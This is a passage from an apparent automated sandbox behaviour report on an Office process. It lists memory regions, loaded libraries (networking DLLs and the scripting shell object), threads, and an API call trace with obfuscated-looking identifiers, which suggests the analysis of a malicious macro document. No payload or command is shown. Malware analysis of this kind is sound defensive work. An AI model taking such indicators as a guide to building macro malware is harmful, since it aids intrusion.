0x11e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e20000" filename = "" Region: id = 670 start_va = 0x11e30000 end_va = 0x11e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e30000" filename = "" Region: id = 671 start_va = 0x11e40000 end_va = 0x11e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e40000" filename = "" Region: id = 672 start_va = 0x11e50000 end_va = 0x11e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e50000" filename = "" Region: id = 673 start_va = 0x11e60000 end_va = 0x11e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e60000" filename = "" Region: id = 674 start_va = 0x11de0000 end_va = 0x11deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011de0000" filename = "" Region: id = 675 start_va = 0x11df0000 end_va = 0x11dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011df0000" filename = "" Region: id = 676 start_va = 0x11e00000 end_va = 0x11e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e00000" filename = "" Region: id = 677 start_va = 0x11e10000 end_va = 0x11e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e10000" filename = "" Region: id = 678 start_va = 0x11e20000 end_va = 0x11e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e20000" filename = "" Region: id = 679 start_va = 0x11e30000 end_va = 0x11e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e30000" filename = "" Region: id = 680 start_va = 0x11e40000 end_va = 0x11e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e40000" filename = "" Region: id = 681 start_va = 0x11e50000 end_va = 0x11e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e50000" filename = "" Region: id = 682 start_va = 0x11e60000 end_va = 0x11e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e60000" filename = "" Region: id = 683 start_va = 0x11e70000 end_va = 0x11e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e70000" filename = "" Region: id = 684 start_va = 0x11e80000 end_va = 0x11e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e80000" filename = "" Region: id = 685 start_va = 0x11e90000 end_va = 0x11e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e90000" filename = "" Region: id = 686 start_va = 0x7fe70000 end_va = 0x7fe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe70000" filename = "" Region: id = 687 start_va = 0x11e10000 end_va = 0x11f51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e10000" filename = "" Region: id = 688 start_va = 0x11f60000 end_va = 0x1209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f60000" filename = "" Region: id = 689 start_va = 0x120a0000 end_va = 0x120affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000120a0000" filename = "" Region: id = 690 start_va = 0x120b0000 end_va = 0x120bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000120b0000" filename = "" Region: id = 691 start_va = 0x120c0000 end_va = 0x120cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000120c0000" filename = "" Region: id = 692 start_va = 0x120c0000 end_va = 0x120cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000120c0000" filename = "" Region: id = 693 start_va = 0x120c0000 end_va = 0x120cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000120c0000" filename = "" Region: id = 694 start_va = 0x120d0000 end_va = 0x120dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000120d0000" filename = "" Region: id = 695 start_va = 0x120e0000 end_va = 0x120effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000120e0000" filename = "" Region: id = 696 start_va = 0x120d0000 end_va = 0x120d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000120d0000" filename = "" Region: id = 697 start_va = 0x120e0000 end_va = 0x120eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000120e0000" filename = "" Region: id = 698 start_va = 0x120f0000 end_va = 0x120fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000120f0000" filename = "" Region: id = 699 start_va = 0x120e0000 end_va = 0x120e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000120e0000" filename = "" Region: id = 700 start_va = 0x12100000 end_va = 0x121b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012100000" filename = "" Region: id = 701 start_va = 0x121c0000 end_va = 0x121ccfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000121c0000" filename = "" Region: id = 702 start_va = 0x121d0000 end_va = 0x121dcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000121d0000" filename = "" Region: id = 703 start_va = 0x71570000 end_va = 0x7177cfff monitored = 0 entry_point = 0x7165acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 704 start_va = 0x11f60000 end_va = 0x11f60fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 705 start_va = 0x71520000 end_va = 0x71531fff monitored = 0 entry_point = 0x71524510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 706 start_va = 0x714f0000 end_va = 0x7151efff monitored = 0 entry_point = 0x714fbb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 707 start_va = 0x71450000 end_va = 0x714eafff monitored = 0 entry_point = 0x7148f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 708 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 709 start_va = 0x71400000 end_va = 0x7144efff monitored = 0 entry_point = 0x7140d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 710 start_va = 0x713f0000 end_va = 0x713f7fff monitored = 0 entry_point = 0x713f1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 711 start_va = 0x708e0000 end_va = 0x70963fff monitored = 0 entry_point = 0x70906530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 712 start_va = 0x11f70000 end_va = 0x11f7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011f70000" filename = "" Region: id = 713 start_va = 0x11f80000 end_va = 0x11fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f80000" filename = "" Region: id = 714 start_va = 0x11fc0000 end_va = 0x11fc2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 715 start_va = 0x121e0000 end_va = 0x122dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000121e0000" filename = "" Region: id = 716 start_va = 0x11fd0000 end_va = 0x11fdcfff monitored = 0 entry_point = 0x11fd7b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 717 start_va = 0x9d40000 end_va = 0x9e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d40000" filename = "" Region: id = 718 start_va = 0x686f0000 end_va = 0x6872afff monitored = 0 entry_point = 0x687056aa region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\msproof7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\msproof7.dll") Region: id = 719 start_va = 0x9e40000 end_va = 0x9e40fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "custom.dic" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\custom.dic") Region: id = 720 start_va = 0x67da0000 end_va = 0x686eafff monitored = 0 entry_point = 0x67e1ec48 region_type = mapped_file name = "igx.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\IGX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\igx.dll") Region: id = 721 start_va = 0x9e40000 end_va = 0x9e41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009e40000" filename = "" Region: id = 722 start_va = 0x9e50000 end_va = 0x9e50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e50000" filename = "" Region: id = 723 start_va = 0x9e60000 end_va = 0x9e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e60000" filename = "" Region: id = 724 start_va = 0x9e80000 end_va = 0x9e80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e80000" filename = "" Region: id = 725 start_va = 0x113e0000 end_va = 0x1141ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000113e0000" filename = "" Region: id = 726 start_va = 0x11420000 end_va = 0x1151ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011420000" filename = "" Region: id = 727 start_va = 0x67d80000 end_va = 0x67d92fff monitored = 0 entry_point = 0x67d825d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 728 start_va = 0x67d60000 end_va = 0x67d73fff monitored = 0 entry_point = 0x67d63c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 729 start_va = 0x67cf0000 end_va = 0x67d57fff monitored = 0 entry_point = 0x67d170a0 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 730 start_va = 0x6fa30000 end_va = 0x6fa37fff monitored = 0 entry_point = 0x6fa31920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 731 start_va = 0x6f9e0000 end_va = 0x6fa26fff monitored = 0 entry_point = 0x6f9f58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 732 start_va = 0x6f970000 end_va = 0x6f9d3fff monitored = 0 entry_point = 0x6f98afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 733 start_va = 0x9e50000 end_va = 0x9e52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e50000" filename = "" Region: id = 734 start_va = 0x6f960000 end_va = 0x6f96ffff monitored = 0 entry_point = 0x6f964600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 735 start_va = 0x6f940000 end_va = 0x6f95ffff monitored = 0 entry_point = 0x6f94d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 736 start_va = 0x6f910000 end_va = 0x6f93bfff monitored = 0 entry_point = 0x6f92bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 737 start_va = 0x9e60000 end_va = 0x9e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e60000" filename = "" Region: id = 738 start_va = 0x6f8f0000 end_va = 0x6f909fff monitored = 0 entry_point = 0x6f8ffa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 739 start_va = 0x9e50000 end_va = 0x9e59fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 740 start_va = 0x67c80000 end_va = 0x67ce3fff monitored = 0 entry_point = 0x67c868c8 region_type = mapped_file name = "msgr8en.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\1033\\msgr8en.dll") Region: id = 741 start_va = 0x67bf0000 end_va = 0x67c7ffff monitored = 0 entry_point = 0x67bf7345 region_type = mapped_file name = "msspell7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\msspell7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msspell7.dll") Region: id = 742 start_va = 0x67ae0000 end_va = 0x67be9fff monitored = 0 entry_point = 0x67b41e10 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll") Region: id = 743 start_va = 0x11520000 end_va = 0x116a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\mssp7en.lex") Region: id = 744 start_va = 0x67a70000 end_va = 0x67ad7fff monitored = 0 entry_point = 0x67a7c3f5 region_type = mapped_file name = "mscss7en.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7en.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7en.dll") Region: id = 745 start_va = 0x9e60000 end_va = 0x9e60fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "excludedictionaryen0409.lex" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\ExcludeDictionaryEN0409.lex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\excludedictionaryen0409.lex") Region: id = 746 start_va = 0x6f8e0000 end_va = 0x6f8e7fff monitored = 0 entry_point = 0x6f8e1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 747 start_va = 0x679e0000 end_va = 0x67a62fff monitored = 0 entry_point = 0x679efbe4 region_type = mapped_file name = "css7data0009.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\CSS7DATA0009.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\css7data0009.dll") Region: id = 748 start_va = 0x116b0000 end_va = 0x11837fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\mssp7en.lex") Region: id = 749 start_va = 0x122e0000 end_va = 0x1283bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "nl7models0009.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\NL7MODELS0009.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\nl7models0009.dll") Region: id = 750 start_va = 0x9e60000 end_va = 0x9e62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscss7cm_en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7cm_en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7cm_en.dub") Region: id = 751 start_va = 0x9e90000 end_va = 0x9eaafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscss7wre_en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7wre_en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7wre_en.dub") Region: id = 752 start_va = 0x12840000 end_va = 0x13041fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msgr8en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSGR8EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msgr8en.lex") Region: id = 753 start_va = 0x9e70000 end_va = 0x9e70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msgr8en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\msgr8en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msgr8en.dub") Region: id = 754 start_va = 0x11840000 end_va = 0x11842fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011840000" filename = "" Region: id = 755 start_va = 0x11850000 end_va = 0x11850fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011850000" filename = "" Region: id = 756 start_va = 0x11fd0000 end_va = 0x1207dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011fd0000" filename = "" Region: id = 757 start_va = 0x13050000 end_va = 0x130f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013050000" filename = "" Region: id = 758 start_va = 0x11840000 end_va = 0x11842fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011840000" filename = "" Region: id = 759 start_va = 0x11850000 end_va = 0x11850fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011850000" filename = "" Thread: id = 1 os_tid = 0x13a4 Thread: id = 2 os_tid = 0x1398 Thread: id = 3 os_tid = 0x138c Thread: id = 4 os_tid = 0x1388 Thread: id = 5 os_tid = 0x1384 Thread: id = 6 os_tid = 0x1380 Thread: id = 7 os_tid = 0x137c Thread: id = 8 os_tid = 0x1378 Thread: id = 9 os_tid = 0x1374 Thread: id = 10 os_tid = 0x1370 Thread: id = 11 os_tid = 0x136c Thread: id = 12 os_tid = 0x1368 Thread: id = 13 os_tid = 0x1364 Thread: id = 14 os_tid = 0x1360 Thread: id = 15 os_tid = 0x1358 Thread: id = 16 os_tid = 0x1354 [0092.726] DispCallFunc (pvInstance=0xb3fd624, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x198170) returned 0x0 [0092.770] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x693e11d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x198080 | out: lpThreadId=0x198080*=0xc84) returned 0xbd0 [0092.799] PeekMessageA (in: lpMsg=0x198060, hWnd=0x3027e, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x198060) returned 0 [0092.860] NtdllDefWindowProc_A (hWnd=0x3027e, Msg=0x1c, wParam=0x0, lParam=0xcd8) returned 0x0 [0092.927] GetActiveWindow () returned 0x0 [0092.927] CRetailMalloc_Alloc () returned 0xf4b1df0 [0092.927] CRetailMalloc_Realloc () returned 0xca150b0 [0092.929] CRetailMalloc_Alloc () returned 0xcab2b10 [0092.929] CRetailMalloc_Realloc () returned 0xcce8ae8 [0092.930] memcpy (in: _Dst=0x197a00, _Src=0x197a28, _Size=0x4 | out: _Dst=0x197a00) returned 0x197a00 [0092.930] realloc (_Block=0x0, _Size=0x100) returned 0xb2a5168 [0092.930] memcpy (in: _Dst=0xb2a5168, _Src=0x197a00, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.930] memcpy (in: _Dst=0x197a10, _Src=0x197a44, _Size=0xc | out: _Dst=0x197a10) returned 0x197a10 [0092.930] realloc (_Block=0x0, _Size=0x60) returned 0xb2a5270 [0092.930] memcpy (in: _Dst=0xb2a5270, _Src=0x197a10, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0092.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb42fe2c, cbMultiByte=8, lpWideCharStr=0x9be0418, cchWideChar=18 | out: lpWideCharStr="GTFEAXDy") returned 8 [0092.930] CRetailMalloc_Realloc () returned 0xf4d41b0 [0092.930] memcpy (in: _Dst=0xf4d5448, _Src=0x9be0414, _Size=0x16 | out: _Dst=0xf4d5448) returned 0xf4d5448 [0092.930] memcpy (in: _Dst=0xb2a5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.930] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.931] memcpy (in: _Dst=0xb2a5168, _Src=0x197894, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.931] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a408ea, cbMultiByte=7, lpWideCharStr=0x197658, cchWideChar=6 | out: lpWideCharStr="Value") returned 0 [0092.931] CRetailMalloc_Realloc () returned 0xf4d1f30 [0092.931] wcscpy_s (in: _Destination=0xf4d5464, _SizeInWords=0x6, _Source="Value" | out: _Destination="Value") returned 0x0 [0092.931] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.931] CRetailMalloc_Realloc () returned 0xc9d1138 [0092.931] memcpy (in: _Dst=0xb2a5168, _Src=0x197894, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.932] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.934] memcpy (in: _Dst=0x197904, _Src=0x197978, _Size=0x8 | out: _Dst=0x197904) returned 0x197904 [0092.934] memcpy (in: _Dst=0xf4dcac0, _Src=0x197904, _Size=0x8 | out: _Dst=0xf4dcac0) returned 0xf4dcac0 [0092.935] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0092.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb42fe5c, cbMultiByte=8, lpWideCharStr=0x9be1616, cchWideChar=18 | out: lpWideCharStr="daKoDigF") returned 8 [0092.935] memcpy (in: _Dst=0xf4d5474, _Src=0x9be1612, _Size=0x16 | out: _Dst=0xf4d5474) returned 0xf4d5474 [0092.935] memcpy (in: _Dst=0xb2a5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.936] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.936] memcpy (in: _Dst=0xb2a5168, _Src=0x197894, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.936] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a408ea, cbMultiByte=7, lpWideCharStr=0x197658, cchWideChar=6 | out: lpWideCharStr="Value") returned 0 [0092.936] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.936] memcpy (in: _Dst=0xb2a5168, _Src=0x197894, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.936] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.936] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.936] memcpy (in: _Dst=0xb2a5168, _Src=0x197894, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.937] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.937] memcpy (in: _Dst=0xb2a516c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0092.937] memcpy (in: _Dst=0xb2a5168, _Src=0x197a08, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.937] memcpy (in: _Dst=0xb2a5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.937] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82c9e, cbMultiByte=7, lpWideCharStr=0x197844, cchWideChar=8 | out: lpWideCharStr="VarPtr") returned 7 [0092.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40496, cbMultiByte=7, lpWideCharStr=0x1978a4, cchWideChar=8 | out: lpWideCharStr="VarPtr") returned 7 [0092.938] CRetailMalloc_Realloc () returned 0xf4a24d8 [0092.938] CRetailMalloc_Realloc () returned 0xc98ba00 [0092.939] CRetailMalloc_Realloc () returned 0xc9d04d8 [0092.939] CRetailMalloc_Realloc () returned 0xc96a470 [0092.939] CRetailMalloc_Realloc () returned 0xf73a7d8 [0092.940] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.940] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.940] memcpy (in: _Dst=0xb2a516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0092.940] memcpy (in: _Dst=0xb2a5170, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0092.940] memcpy (in: _Dst=0xb2a5174, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5174) returned 0xb2a5174 [0092.940] memcpy (in: _Dst=0xb2a5174, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5174) returned 0xb2a5174 [0092.940] CRetailMalloc_Realloc () returned 0xc9dc768 [0092.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb42fefc, cbMultiByte=13, lpWideCharStr=0x9be3be0, cchWideChar=28 | out: lpWideCharStr="AxRBGEJUCmoi1") returned 13 [0092.940] memcpy (in: _Dst=0xf4d5490, _Src=0x9be3bdc, _Size=0x20 | out: _Dst=0xf4d5490) returned 0xf4d5490 [0092.940] memcpy (in: _Dst=0xb2a5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.941] memcpy (in: _Dst=0xb2a5168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb42ff14, cbMultiByte=7, lpWideCharStr=0x9be3f9c, cchWideChar=16 | out: lpWideCharStr="WkOyJWJ") returned 7 [0092.941] memcpy (in: _Dst=0xf4d54b4, _Src=0x9be3f98, _Size=0x14 | out: _Dst=0xf4d54b4) returned 0xf4d54b4 [0092.941] memcpy (in: _Dst=0xb2a516c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0092.942] memcpy (in: _Dst=0xb2a516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0092.942] memcpy (in: _Dst=0xb2a5170, _Src=0x197894, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0092.942] memcpy (in: _Dst=0xb2a5170, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0092.942] memcpy (in: _Dst=0xb2a5168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0092.942] memcpy (in: _Dst=0xb2a516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0092.942] memcpy (in: 